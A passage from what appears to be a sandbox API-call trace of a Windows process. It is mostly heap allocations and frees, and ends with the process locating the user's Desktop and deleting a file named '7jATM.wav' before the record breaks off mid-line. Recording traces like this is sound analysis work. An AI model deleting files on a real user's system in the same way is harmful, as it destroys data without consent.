[0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0087.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.932] CloseHandle (hObject=0x294) returned 1 [0087.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.935] CloseHandle (hObject=0x2c4) returned 1 [0087.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0087.938] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75678 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.941] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0087.942] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.942] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0087.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0087.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d7f0 [0087.943] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/7jATM.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav", lpFilePart=0x8cedf4*="7jATM.wav") returned 0x21 [0087.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7f0 | out: hHeap=0x2af0000) returned 1 [0087.943] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\7jatm.wav")) returned 0x20 [0087.943] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="7jATM.wav", cAlternateFileName="")) returned 0x9a3b80 [0087.943] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\7jatm.wav")) returned 1 [0087.950] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="7jATM.wav", cAlternateFileName="")) returned 0 [0087.950] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0087.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0087.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0087.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: 